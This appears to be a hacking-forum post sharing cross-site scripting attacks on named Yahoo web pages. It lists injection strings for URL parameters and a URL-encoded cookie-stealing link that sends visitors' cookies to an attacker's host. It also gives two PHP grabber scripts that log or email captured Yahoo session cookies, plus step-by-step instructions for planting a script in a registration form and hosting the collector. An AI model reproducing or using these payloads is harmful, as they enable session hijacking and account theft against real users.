Codice:
view
http://email.yahoosearchmarketing.com/acq/smx/pages/profile.php?
profile.php?
Code:
s=Y";><ScRipt>alert('testByKhalsa');</script>
Code:
o=INVALID";><ScRipt>alert('testByKhalsa');</script>
Code:
s3=";><ScRipt>alert('testByKhalsa');</script>
Code:
s2=";><ScRipt>alert('testByKhalsa');</script>
-----------------------------------------------------------------------------------------------------------
cookie stealing link :
Code:
http://tw.bbs.yahoo.com/cgi-bin/LocalSearch.cgi?board=&database=bid&keyword=&type=1&query='%3C%2F%53%43%52%49%50%54%3E%3C%53%43%52%49%50%54%3E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%68%6F%73%74%2E%63%6F%6D%2F%67%72%61%62%62%65%72%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E
php grabber :
Code:
<?php
$cookie = $_GET[cookie];
$Y = explode('Y=', $cookie);
$Y = $Y[1];
$Y = explode(';', $Y);
$Y = $Y[0];
$T = explode('T=', $cookie);
$T = $T[1];
$T = explode(';', $T);
$T = $T[0];
$msg = "<html>Y=".$Y." <br>
<p>T=".$T."<br></html>";
$header = "Content-Type: text/html; charset=ISO-8859-4";
echo $msg;
mail('[email protected]', 'cookie', $msg, $header);
header('Location: http://www.google.ro');
?>
intructions :
Code:
Unescape the escaped chars in the stealing link and change the www.host.com to your host and then escape them back.
-------------------------------------------------------------------------------------
it goes like that:
you need to "register" yourself an "account" or something...
stupid thing but it works...
go to:
https://buzz.research.yahoo.com/dm/login/register.html
on "username" insert this code:
'><SCRIPT>location.href="http://www.yourhost.com/c.php?c="+escape(document.cookie)</SCRIPT>
this is the c.php:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
and make *.txt file:
log.txt
and now upload it to your server.
CHMOD: 777
now on yahoo..click on "I Agree/Register"
and you will get on the adress bar something like that:
https://buzz.research.yahoo.com/dm/l...tml?eid=223322
now this is your cookie stealer..this link:
https://buzz.research.yahoo.com/dm/l...tml?eid=223322 (random number)
example:
https://buzz.research.yahoo.com/dm/l...er.html?eid=21
i'll appreciate a good posts from you.
"thanks, good work" etc...
have a nice day. :-)